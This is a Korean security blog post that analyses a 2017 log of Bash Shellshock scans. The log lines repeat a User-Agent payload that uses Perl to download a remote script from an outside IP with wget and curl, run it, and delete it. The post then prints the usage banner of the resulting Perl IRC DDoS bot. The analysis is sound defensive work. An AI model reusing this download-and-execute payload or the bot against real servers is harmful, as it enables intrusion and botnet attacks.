홈페이지 취약점 분석 이야기 파일 지도 사진 깨알






>> 목록보이기
#공격로그 #스캔로그 #Bash Shellshock #쉘쇼크 #CVE-2014-6271 #자동화 공격도구 #IRC Botent #ircbot #dxd2.txt #DDoS 봇넷 #A5-Security Misconfiguration #A1-Injection

오늘의 웹서버 취약점 스캔 로그: Bash Shellshock 기반 ircbot bonet 구축 시도

2014년에 발표된 이후로 여전히 Bash Shellshock 취약점은 주요 자동화공격 대상에 포함되어 있다. 오늘 관찰한 쉘쇼크 취약점 스캔 로그는 ircbot 기반의 DDoS 봇넷 구축을 하려는 시도로 보인다.

46.105.123.22 - - [21/Jan/2017:19:04:41 +0900] "GET HTTP/1.1 HTTP/1.1" 400 455 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://192.99.1.177/dxd2.txt -O /tmp/dxd2.txt;curl -O /tmp/dxd2.txt http://192.99.1.177/dxd2.txt;perl /tmp/dxd2.txt;rm -rf /tmp/dxd2.*\");'"
46.105.123.22 - - [21/Jan/2017:19:04:45 +0900] "GET /main.cgi HTTP/1.1" 404 433 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://192.99.1.177/dxd2.txt -O /tmp/dxd2.txt;curl -O /tmp/dxd2.txt http://192.99.1.177/dxd2.txt;perl /tmp/dxd2.txt;rm -rf /tmp/dxd2.*\");'"
46.105.123.22 - - [21/Jan/2017:19:04:45 +0900] "GET /info.cgi HTTP/1.1" 404 433 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://192.99.1.177/dxd2.txt -O /tmp/dxd2.txt;curl -O /tmp/dxd2.txt http://192.99.1.177/dxd2.txt;perl /tmp/dxd2.txt;rm -rf /tmp/dxd2.*\");'"
46.105.123.22 - - [21/Jan/2017:19:04:46 +0900] "GET /index.cgi HTTP/1.1" 404 434 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://192.99.1.177/dxd2.txt -O /tmp/dxd2.txt;curl -O /tmp/dxd2.txt http://192.99.1.177/dxd2.txt;perl /tmp/dxd2.txt;rm -rf /tmp/dxd2.*\");'"
46.105.123.22 - - [21/Jan/2017:19:04:48 +0900] "GET /admin.cgi HTTP/1.1" 404 434 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://192.99.1.177/dxd2.txt -O /tmp/dxd2.txt;curl -O /tmp/dxd2.txt http://192.99.1.177/dxd2.txt;perl /tmp/dxd2.txt;rm -rf /tmp/dxd2.*\");'"
46.105.123.22 - - [21/Jan/2017:19:04:48 +0900] "GET /administrator.cgi HTTP/1.1" 404 442 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://192.99.1.177/dxd2.txt -O /tmp/dxd2.txt;curl -O /tmp/dxd2.txt http://192.99.1.177/dxd2.txt;perl /tmp/dxd2.txt;rm -rf /tmp/dxd2.*\");'"
46.105.123.22 - - [21/Jan/2017:19:04:49 +0900] "GET /cgi-bin/report.cgi HTTP/1.1" 404 443 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://192.99.1.177/dxd2.txt -O /tmp/dxd2.txt;curl -O /tmp/dxd2.txt http://192.99.1.177/dxd2.txt;perl /tmp/dxd2.txt;rm -rf /tmp/dxd2.*\");'"
46.105.123.22 - - [21/Jan/2017:19:04:49 +0900] "GET /cgi-bin/webmap.cgi HTTP/1.1" 404 443 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://192.99.1.177/dxd2.txt -O /tmp/dxd2.txt;curl -O /tmp/dxd2.txt http://192.99.1.177/dxd2.txt;perl /tmp/dxd2.txt;rm -rf /tmp/dxd2.*\");'"
46.105.123.22 - - [21/Jan/2017:19:04:51 +0900] "GET /cgi-bin/whois.cgi HTTP/1.1" 404 442 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://192.99.1.177/dxd2.txt -O /tmp/dxd2.txt;curl -O /tmp/dxd2.txt http://192.99.1.177/dxd2.txt;perl /tmp/dxd2.txt;rm -rf /tmp/dxd2.*\");'"
46.105.123.22 - - [21/Jan/2017:19:04:51 +0900] "GET /cgi-sys/helpdesk.cgi HTTP/1.1" 404 445 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://192.99.1.177/dxd2.txt -O /tmp/dxd2.txt;curl -O /tmp/dxd2.txt http://192.99.1.177/dxd2.txt;perl /tmp/dxd2.txt;rm -rf /tmp/dxd2.*\");'"
46.105.123.22 - - [21/Jan/2017:19:04:53 +0900] "GET /cgi-bin/register.cgi HTTP/1.1" 404 445 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://192.99.1.177/dxd2.txt -O /tmp/dxd2.txt;curl -O /tmp/dxd2.txt http://192.99.1.177/dxd2.txt;perl /tmp/dxd2.txt;rm -rf /tmp/dxd2.*\");'"
46.105.123.22 - - [21/Jan/2017:19:04:54 +0900] "GET /cgi-bin/download.cgi HTTP/1.1" 404 445 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://192.99.1.177/dxd2.txt -O /tmp/dxd2.txt;curl -O /tmp/dxd2.txt http://192.99.1.177/dxd2.txt;perl /tmp/dxd2.txt;rm -rf /tmp/dxd2.*\");'"
46.105.123.22 - - [21/Jan/2017:19:04:55 +0900] "GET /cgi-bin/shop.cgi HTTP/1.1" 404 441 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://192.99.1.177/dxd2.txt -O /tmp/dxd2.txt;curl -O /tmp/dxd2.txt http://192.99.1.177/dxd2.txt;perl /tmp/dxd2.txt;rm -rf /tmp/dxd2.*\");'"
46.105.123.22 - - [21/Jan/2017:19:04:56 +0900] "GET /cgi-sys/signup.cgi HTTP/1.1" 404 443 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://192.99.1.177/dxd2.txt -O /tmp/dxd2.txt;curl -O /tmp/dxd2.txt http://192.99.1.177/dxd2.txt;perl /tmp/dxd2.txt;rm -rf /tmp/dxd2.*\");'"
46.105.123.22 - - [21/Jan/2017:19:04:56 +0900] "GET /cgi-bin/profile.cgi HTTP/1.1" 404 444 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://192.99.1.177/dxd2.txt -O /tmp/dxd2.txt;curl -O /tmp/dxd2.txt http://192.99.1.177/dxd2.txt;perl /tmp/dxd2.txt;rm -rf /tmp/dxd2.*\");'"
46.105.123.22 - - [21/Jan/2017:19:04:57 +0900] "GET /cgi-bin/about_us.cgi HTTP/1.1" 404 445 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://192.99.1.177/dxd2.txt -O /tmp/dxd2.txt;curl -O /tmp/dxd2.txt http://192.99.1.177/dxd2.txt;perl /tmp/dxd2.txt;rm -rf /tmp/dxd2.*\");'"
46.105.123.22 - - [21/Jan/2017:19:04:58 +0900] "GET /cgi-bin/php.fcgi HTTP/1.1" 404 441 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://192.99.1.177/dxd2.txt -O /tmp/dxd2.txt;curl -O /tmp/dxd2.txt http://192.99.1.177/dxd2.txt;perl /tmp/dxd2.txt;rm -rf /tmp/dxd2.*\");'"
46.105.123.22 - - [21/Jan/2017:19:04:58 +0900] "GET /cgi-bin/calendar.cgi HTTP/1.1" 404 445 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://192.99.1.177/dxd2.txt -O /tmp/dxd2.txt;curl -O /tmp/dxd2.txt http://192.99.1.177/dxd2.txt;perl /tmp/dxd2.txt;rm -rf /tmp/dxd2.*\");'"
46.105.123.22 - - [21/Jan/2017:19:05:00 +0900] "GET /cgi-bin/download.cgi HTTP/1.1" 404 445 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://192.99.1.177/dxd2.txt -O /tmp/dxd2.txt;curl -O /tmp/dxd2.txt http://192.99.1.177/dxd2.txt;perl /tmp/dxd2.txt;rm -rf /tmp/dxd2.*\");'"
46.105.123.22 - - [21/Jan/2017:19:05:00 +0900] "GET /cgi-bin/light_board.cgi HTTP/1.1" 404 448 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://192.99.1.177/dxd2.txt -O /tmp/dxd2.txt;curl -O /tmp/dxd2.txt http://192.99.1.177/dxd2.txt;perl /tmp/dxd2.txt;rm -rf /tmp/dxd2.*\");'"
46.105.123.22 - - [21/Jan/2017:19:05:01 +0900] "GET /cgi-bin/main.cgi HTTP/1.1" 404 441 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://192.99.1.177/dxd2.txt -O /tmp/dxd2.txt;curl -O /tmp/dxd2.txt http://192.99.1.177/dxd2.txt;perl /tmp/dxd2.txt;rm -rf /tmp/dxd2.*\");'"
46.105.123.22 - - [21/Jan/2017:19:05:01 +0900] "GET /cgi-bin/search.cgi HTTP/1.1" 404 443 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://192.99.1.177/dxd2.txt -O /tmp/dxd2.txt;curl -O /tmp/dxd2.txt http://192.99.1.177/dxd2.txt;perl /tmp/dxd2.txt;rm -rf /tmp/dxd2.*\");'"
46.105.123.22 - - [21/Jan/2017:19:05:02 +0900] "GET /cgi-bin/test.cgi HTTP/1.1" 404 441 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://192.99.1.177/dxd2.txt -O /tmp/dxd2.txt;curl -O /tmp/dxd2.txt http://192.99.1.177/dxd2.txt;perl /tmp/dxd2.txt;rm -rf /tmp/dxd2.*\");'"
46.105.123.22 - - [21/Jan/2017:19:05:04 +0900] "GET /cgi-bin/file_up.cgi HTTP/1.1" 404 444 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://192.99.1.177/dxd2.txt -O /tmp/dxd2.txt;curl -O /tmp/dxd2.txt http://192.99.1.177/dxd2.txt;perl /tmp/dxd2.txt;rm -rf /tmp/dxd2.*\");'"
46.105.123.22 - - [21/Jan/2017:19:05:04 +0900] "GET /cgi-bin/concept.cgi HTTP/1.1" 404 444 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://192.99.1.177/dxd2.txt -O /tmp/dxd2.txt;curl -O /tmp/dxd2.txt http://192.99.1.177/dxd2.txt;perl /tmp/dxd2.txt;rm -rf /tmp/dxd2.*\");'"
46.105.123.22 - - [21/Jan/2017:19:05:05 +0900] "GET /cgi-bin/query.cgi HTTP/1.1" 404 442 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://192.99.1.177/dxd2.txt -O /tmp/dxd2.txt;curl -O /tmp/dxd2.txt http://192.99.1.177/dxd2.txt;perl /tmp/dxd2.txt;rm -rf /tmp/dxd2.*\");'"
46.105.123.22 - - [21/Jan/2017:19:05:05 +0900] "GET /cgi-bin/counter.cgi HTTP/1.1" 404 444 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://192.99.1.177/dxd2.txt -O /tmp/dxd2.txt;curl -O /tmp/dxd2.txt http://192.99.1.177/dxd2.txt;perl /tmp/dxd2.txt;rm -rf /tmp/dxd2.*\");'"
46.105.123.22 - - [21/Jan/2017:19:05:06 +0900] "GET /cgi-bin/kontakt.cgi HTTP/1.1" 404 444 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://192.99.1.177/dxd2.txt -O /tmp/dxd2.txt;curl -O /tmp/dxd2.txt http://192.99.1.177/dxd2.txt;perl /tmp/dxd2.txt;rm -rf /tmp/dxd2.*\");'"
46.105.123.22 - - [21/Jan/2017:19:05:08 +0900] "GET /cgi-bin/backup.cgi HTTP/1.1" 404 443 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://192.99.1.177/dxd2.txt -O /tmp/dxd2.txt;curl -O /tmp/dxd2.txt http://192.99.1.177/dxd2.txt;perl /tmp/dxd2.txt;rm -rf /tmp/dxd2.*\");'"
46.105.123.22 - - [21/Jan/2017:19:05:08 +0900] "GET /cgi-bin/firewall.cgi HTTP/1.1" 404 445 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://192.99.1.177/dxd2.txt -O /tmp/dxd2.txt;curl -O /tmp/dxd2.txt http://192.99.1.177/dxd2.txt;perl /tmp/dxd2.txt;rm -rf /tmp/dxd2.*\");'"
46.105.123.22 - - [21/Jan/2017:19:05:09 +0900] "GET /cgi-bin/index.cgi HTTP/1.1" 404 442 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://192.99.1.177/dxd2.txt -O /tmp/dxd2.txt;curl -O /tmp/dxd2.txt http://192.99.1.177/dxd2.txt;perl /tmp/dxd2.txt;rm -rf /tmp/dxd2.*\");'"
46.105.123.22 - - [21/Jan/2017:19:05:09 +0900] "GET /cgi-bin/index2.cgi HTTP/1.1" 404 443 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://192.99.1.177/dxd2.txt -O /tmp/dxd2.txt;curl -O /tmp/dxd2.txt http://192.99.1.177/dxd2.txt;perl /tmp/dxd2.txt;rm -rf /tmp/dxd2.*\");'"
46.105.123.22 - - [21/Jan/2017:19:05:10 +0900] "GET /cgi-bin/reboot.cgi HTTP/1.1" 404 443 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://192.99.1.177/dxd2.txt -O /tmp/dxd2.txt;curl -O /tmp/dxd2.txt http://192.99.1.177/dxd2.txt;perl /tmp/dxd2.txt;rm -rf /tmp/dxd2.*\");'"
46.105.123.22 - - [21/Jan/2017:19:05:11 +0900] "GET /cgi-bin/printenv HTTP/1.1" 404 441 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://192.99.1.177/dxd2.txt -O /tmp/dxd2.txt;curl -O /tmp/dxd2.txt http://192.99.1.177/dxd2.txt;perl /tmp/dxd2.txt;rm -rf /tmp/dxd2.*\");'"
46.105.123.22 - - [21/Jan/2017:19:05:11 +0900] "GET /cgi-bin/test-cgi HTTP/1.1" 404 441 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://192.99.1.177/dxd2.txt -O /tmp/dxd2.txt;curl -O /tmp/dxd2.txt http://192.99.1.177/dxd2.txt;perl /tmp/dxd2.txt;rm -rf /tmp/dxd2.*\");'"
46.105.123.22 - - [21/Jan/2017:19:05:12 +0900] "GET /cgi-bin/formmail.cgi HTTP/1.1" 404 445 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://192.99.1.177/dxd2.txt -O /tmp/dxd2.txt;curl -O /tmp/dxd2.txt http://192.99.1.177/dxd2.txt;perl /tmp/dxd2.txt;rm -rf /tmp/dxd2.*\");'"
46.105.123.22 - - [21/Jan/2017:19:05:16 +0900] "GET /cgi-bin/supply.cgi HTTP/1.1" 404 443 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://192.99.1.177/dxd2.txt -O /tmp/dxd2.txt;curl -O /tmp/dxd2.txt http://192.99.1.177/dxd2.txt;perl /tmp/dxd2.txt;rm -rf /tmp/dxd2.*\");'"
46.105.123.22 - - [21/Jan/2017:19:05:17 +0900] "GET /cgi-bin/test.sh HTTP/1.1" 404 440 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://192.99.1.177/dxd2.txt -O /tmp/dxd2.txt;curl -O /tmp/dxd2.txt http://192.99.1.177/dxd2.txt;perl /tmp/dxd2.txt;rm -rf /tmp/dxd2.*\");'"
46.105.123.22 - - [21/Jan/2017:19:05:18 +0900] "GET /cgi-bin/upload.cgi HTTP/1.1" 404 443 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://192.99.1.177/dxd2.txt -O /tmp/dxd2.txt;curl -O /tmp/dxd2.txt http://192.99.1.177/dxd2.txt;perl /tmp/dxd2.txt;rm -rf /tmp/dxd2.*\");'"
46.105.123.22 - - [21/Jan/2017:19:05:23 +0900] "GET /cgi-bin/status.cgi HTTP/1.1" 404 443 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://192.99.1.177/dxd2.txt -O /tmp/dxd2.txt;curl -O /tmp/dxd2.txt http://192.99.1.177/dxd2.txt;perl /tmp/dxd2.txt;rm -rf /tmp/dxd2.*\");'"
46.105.123.22 - - [21/Jan/2017:19:05:24 +0900] "GET /cgi-bin/uptime.cgi HTTP/1.1" 404 443 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://192.99.1.177/dxd2.txt -O /tmp/dxd2.txt;curl -O /tmp/dxd2.txt http://192.99.1.177/dxd2.txt;perl /tmp/dxd2.txt;rm -rf /tmp/dxd2.*\");'"
46.105.123.22 - - [21/Jan/2017:19:05:28 +0900] "GET /cgi-bin/contact.cgi HTTP/1.1" 404 444 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://192.99.1.177/dxd2.txt -O /tmp/dxd2.txt;curl -O /tmp/dxd2.txt http://192.99.1.177/dxd2.txt;perl /tmp/dxd2.txt;rm -rf /tmp/dxd2.*\");'"
46.105.123.22 - - [21/Jan/2017:19:05:35 +0900] "GET /cgi-bin/hello.cgi HTTP/1.1" 404 442 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://192.99.1.177/dxd2.txt -O /tmp/dxd2.txt;curl -O /tmp/dxd2.txt http://192.99.1.177/dxd2.txt;perl /tmp/dxd2.txt;rm -rf /tmp/dxd2.*\");'"
46.105.123.22 - - [21/Jan/2017:19:05:36 +0900] "GET /cgi-bin/php HTTP/1.1" 404 436 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://192.99.1.177/dxd2.txt -O /tmp/dxd2.txt;curl -O /tmp/dxd2.txt http://192.99.1.177/dxd2.txt;perl /tmp/dxd2.txt;rm -rf /tmp/dxd2.*\");'"
46.105.123.22 - - [21/Jan/2017:19:05:37 +0900] "GET /cgi-bin/php4 HTTP/1.1" 404 437 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://192.99.1.177/dxd2.txt -O /tmp/dxd2.txt;curl -O /tmp/dxd2.txt http://192.99.1.177/dxd2.txt;perl /tmp/dxd2.txt;rm -rf /tmp/dxd2.*\");'"
46.105.123.22 - - [21/Jan/2017:19:05:37 +0900] "GET /cgi-bin/php5 HTTP/1.1" 404 437 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://192.99.1.177/dxd2.txt -O /tmp/dxd2.txt;curl -O /tmp/dxd2.txt http://192.99.1.177/dxd2.txt;perl /tmp/dxd2.txt;rm -rf /tmp/dxd2.*\");'"
46.105.123.22 - - [21/Jan/2017:19:05:38 +0900] "GET /cgi-bin/php5-cli HTTP/1.1" 404 441 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://192.99.1.177/dxd2.txt -O /tmp/dxd2.txt;curl -O /tmp/dxd2.txt http://192.99.1.177/dxd2.txt;perl /tmp/dxd2.txt;rm -rf /tmp/dxd2.*\");'"
46.105.123.22 - - [21/Jan/2017:19:05:39 +0900] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.1" 404 451 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://192.99.1.177/dxd2.txt -O /tmp/dxd2.txt;curl -O /tmp/dxd2.txt http://192.99.1.177/dxd2.txt;perl /tmp/dxd2.txt;rm -rf /tmp/dxd2.*\");'"
46.105.123.22 - - [21/Jan/2017:19:05:39 +0900] "GET /cgi-sys/entropysearch.cgi HTTP/1.1" 404 450 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://192.99.1.177/dxd2.txt -O /tmp/dxd2.txt;curl -O /tmp/dxd2.txt http://192.99.1.177/dxd2.txt;perl /tmp/dxd2.txt;rm -rf /tmp/dxd2.*\");'"
46.105.123.22 - - [21/Jan/2017:19:05:43 +0900] "GET /phppath/cgi_wrapper HTTP/1.1" 404 444 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://192.99.1.177/dxd2.txt -O /tmp/dxd2.txt;curl -O /tmp/dxd2.txt http://192.99.1.177/dxd2.txt;perl /tmp/dxd2.txt;rm -rf /tmp/dxd2.*\");'"
46.105.123.22 - - [21/Jan/2017:19:05:43 +0900] "GET /phppath/php HTTP/1.1" 404 436 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://192.99.1.177/dxd2.txt -O /tmp/dxd2.txt;curl -O /tmp/dxd2.txt http://192.99.1.177/dxd2.txt;perl /tmp/dxd2.txt;rm -rf /tmp/dxd2.*\");'"

공격자 IP주소는 46.105.123.22(프랑스 소재)이다.

위의 접속로그들은 2014년에 처음 발견된 Bash Shellshock 취약점 (CVE-2014-6271)을 공략하고 있다. User-Agent 문자열에 () { :;};운영체제-명령어을 웹 서버에 전달하여 취약점이 있는 Bash로 하여금 공격자가 원하는 운영체제-명령어를 실행하려는 시도이다. /main.cgi, /info.cgi, /index.cgi, /admin.cgi, /cgi-bin/report.cgi 등의 URL을 목표로 하고 있다. 아마도 지금까지 해커들이 찾아낸 Bash Shellshock 취약점을 가지는 시스템들의 취약한 URL 목록일 것이다.

공격자는 PERL 해석기를 통해서 명령어 실행을 시도하고 있다.

/usr/bin/perl -e 'PERL-코드'

표적 시스템이 Bash Shellshock 취약점을 가지고 있고, /usr/bin/perl(PERL 해석기, Perl Interpreter)이 존재하면 PERL-코드를 실행할 것이다.

첫번째 Perl 코드는

print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";

이다. /usr/bin/perl(PERL 해석기)이 존재하면 공격자의 공격도구로 HTTP의 본문에 "XSUCCESS!"라는 문자열을 전송한다. 이 문자열이 탐지되면 Bash Shellshock 취약점이 존재하며, 웹 서버에서 PERL도 실행가능하다는 뜻이다. 대부분의 Linux 시스템은 기본적으로 Perl 해석기가 설치되어 있다.

두번째 Perl 코드는

system(\"wget http://192.99.1.177/dxd2.txt -O /tmp/dxd2.txt;curl -O /tmp/dxd2.txt http://192.99.1.177/dxd2.txt;perl /tmp/dxd2.txt;rm -rf /tmp/dxd2.*\");

system() 함수를 이용하여 원격지(192.99.1.177, 캐나다 퀘벡주)에서 펄 스크립트를 받아서 실행하고 파일은 지운다. 명령어 실행 순서는 다음과 같다.

  1. wget http://192.99.1.177/dxd2.txt -O /tmp/dxd2.txt
    - wget으로 원격지의 dxd2.txt 파일을 받아서 /tmp/에 저장한다.
  2. curl -O /tmp/dxd2.txt http://192.99.1.177/dxd2.txt
    - curl로 원격지의 dxd2.txt 파일을 받아서 /tmp/에 저장한다.
    - 결국, wget이나 curl 중 하나만 있어도 원격지의 파일이 저장된다. 수율을 높이기 위한 전략이다.
  3. perl /tmp/dxd2.txt
    - perl을 이용하여 웹 서버에 저장한 /tmp/dxd2.txt를 실행한다.
  4. rm -rf /tmp/dxd2.*
    - /tmp/dxd2.*를 삭제하여 공격 흔적을 지운다.
    - 이 결과로 메모리에서는 악성코드가 실행중이지만 파일시스템에는 악성코드가 남지않아서 탐지를 힘들게 한다.

악성코드 분석

바이러스토탈의 http://192.99.1.177/dxd2.txt 파일 분석 결과를 보면 두 개의 안티바이러스 소프트웨어가 Mal/PerlBot-A, Perl.Pircbot로 판별하고 있다. Perl 기반의 IRC Bot으로 추정된다.

원본 파일과 디코딩한 파일은 dxd2.tgz로 저장해 놓았다. 분석이 필요하면 다운로드하여 시험해볼 수 있다. 다만 이 코드를 실행하면 IRC를 통해서 외부 공격자들이 마구 접속할 것이므로 실행은 권하지 않는다.

http://192.99.1.177/dxd2.txt 파일은 Base64로 인코딩된 Perl 스크립트 파일이다. 디코딩하여 첫부분의 사용법을 살펴보면 아래와 같다.

#!/usr/bin/perl
####################################################################################################################
####################################################################################################################
##  perlBot v1.02012 By unknown @unknown   ##    [ Help ]   ####################################
##      Stealth MultiFunctional IrcBot Writen in Perl          #####################################################
##        Teste on every system with PERL instlled             ##  !x @system                                     ##
##                                                             ##  !x @version                                    ##
##     This is a free program used on your own risk.           ##  !x @channel                                    ##
##        Created for educational purpose only.                ##  !x @flood                                      ##
## I'm not responsible for the illegal use of this program.    ##  !x @utils                                      ##
####################################################################################################################
## [ Channel ] #################### [ Flood ] ################################## [ Utils ] #########################
####################################################################################################################
## !x !join <#channel>          ## !x @udp1 <ip> <port> <time>              ##  !su @conback &l;tip> <port>          ##
## !x !part <#channel>          ## !x @udp2 <ip> <packet size> <time>       ##  !x @downlod <url+path> <file>     ##
## !x !xejoin <#channel>        ## !x @udp3 <ip> <port> <time>              ##  !x @portscan <ip>                 ##
## !x !op <channel> <nick>      ## !x @tcp <ip> <port> <packet size> <time> ##  !x @mail <subject> <sender>       ##
## !x !deop <channel> <nick>    ## !x @http <site> <time>                   ##           <recipient> <message>    ##
## !x !voice <channel> <nick>   ##                                          ##  !x pwd;uname -a;id <for example>  ##
## !x !devoice <channel> <nick> ## !x @ctcpflood <nick>                     ##  !x @port <ip> <port>              ##
## !x !nick <newnick>           ## !x @msgflood <nick>                      ##  !x @dns <ip/host>                 ##
## !x !msg <nick>               ## !x @noticeflood <nick>                   ##                                    ##
## !x !quit                     ##                                          ##                                    ##
## !x !xaw                      ##                                          ##                                    ##
## !x !die                      ##                                          ##                                    ##
####################################################################################################################
####################################################################################################################

IRC 채널을 장악하기 위한 공격법이었던 CTCP Flood(@ctcpflood), Message Flood(@msgflood), Notice Flood(@noticeflood) 등의 사용법이 보인다. 이 IRC Bot이 실행된 서버는 IRC 봇넷의 일원이 되어 DDoS 공격에 동원된다고 한다. 이외에도 역방향접속(conback), 다운로드(download), 포트스캔(portscan) 등의 다양한 기능을 갖춘 것으로 보인다.

[처음 작성한 날: 2017.01.22]    [마지막으로 고친 날: 2017.01.22] 


< 이전 글 : 오늘의 웹서버 공격 로그: Apache ProxyAbuse 탐지 시도 (2017.01.22)

> 다음 글 : 오늘의 웹서버 공격 로그: phpMyAdmin 취약점 자동탐색 도구 - ZmEu Scanner (2017.01.21)


크리에이티브 커먼즈 라이선스 이 저작물은 크리에이티브 커먼즈 저작자표시 4.0 국제 라이선스에 따라 이용할 수 있습니다.
잘못된 내용, 오탈자 및 기타 문의사항은 j1n5uk{at}daum.net으로 연락주시기 바랍니다.
문서의 시작으로 컴퓨터 깨알지식 웹핵 누리집 대문